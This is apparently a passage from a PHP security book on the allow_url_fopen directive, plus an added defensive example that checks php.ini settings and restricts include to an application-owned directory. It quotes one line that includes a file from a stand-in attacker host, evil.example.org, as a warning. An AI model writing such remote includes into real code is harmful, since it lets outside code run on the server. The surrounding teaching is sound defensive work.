As illustrated in Chapter 6, the allow_url_fopen directive allows you to reference remote resources as if they were local files:
<?php $contents = file_get_contents('http://example.org/xss.html'); ?>
Chapter 5 reveals how dangerous this is when combined with the use of include or require:
<?php include 'http://evil.example.org/evil.inc'; ?>
I recommend disabling allow_url_fopen unless your application requires it.
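The two snippets above show the remote fetch and the remote include that the directive makes possible. As an added example, not code from the book, the block below shows the defensive side: a startup check that notices when a deployment still has remote file access switched on, and an include helper that only ever loads a named file from one application-controlled directory, so that neither a URL nor a path supplied by the client can reach include. The helper names (remote_access_settings, safe_include), the includes directory and the .inc extension are assumptions made for the example.

```php
<?php
// Added example (not from the book): defensive handling of includes.

// Directory the application is willing to include from (assumed path).
const INCLUDE_BASE = __DIR__ . '/includes';

/**
 * Report whether remote file access is enabled at runtime, so that a
 * deployment whose php.ini was never changed is noticed immediately.
 */
function remote_access_settings(): array
{
    return [
        // allow_url_fopen: file_get_contents(), fopen() etc. may open URLs.
        'allow_url_fopen'   => filter_var(ini_get('allow_url_fopen'), FILTER_VALIDATE_BOOLEAN),
        // allow_url_include (PHP 5.2 and later): include/require may load URLs.
        'allow_url_include' => filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN),
    ];
}

/**
 * Include a file chosen by short name, never by path or URL.
 * Accepts only a simple identifier, maps it onto INCLUDE_BASE, and uses
 * realpath() to confirm the resolved file really lives under that directory
 * (this also defeats ../ sequences and symbolic links pointing elsewhere).
 */
function safe_include(string $name): void
{
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}$/', $name)) {
        throw new InvalidArgumentException('invalid include name');
    }
    $base = realpath(INCLUDE_BASE);
    $path = realpath(INCLUDE_BASE . '/' . $name . '.inc');
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        throw new RuntimeException('include outside of allowed directory');
    }
    include $path;
}

// Usage: log loudly if remote access is still on in this deployment.
$settings = remote_access_settings();
if ($settings['allow_url_fopen'] || $settings['allow_url_include']) {
    error_log('warning: remote file access is enabled; check php.ini');
}

// The client chooses an identifier; the application decides the file location.
safe_include($_GET['page'] ?? 'home');
```

The configuration this checks for is `allow_url_fopen = Off` in php.ini, and on PHP 5.2 and later also `allow_url_include = Off`, which is the separate directive that governs include and require of URLs even when ordinary URL fopen is permitted. The helper is worth keeping even with both directives off: it confines include to a directory the application owns, so a later change to php.ini does not silently reintroduce the Chapter 5 problem.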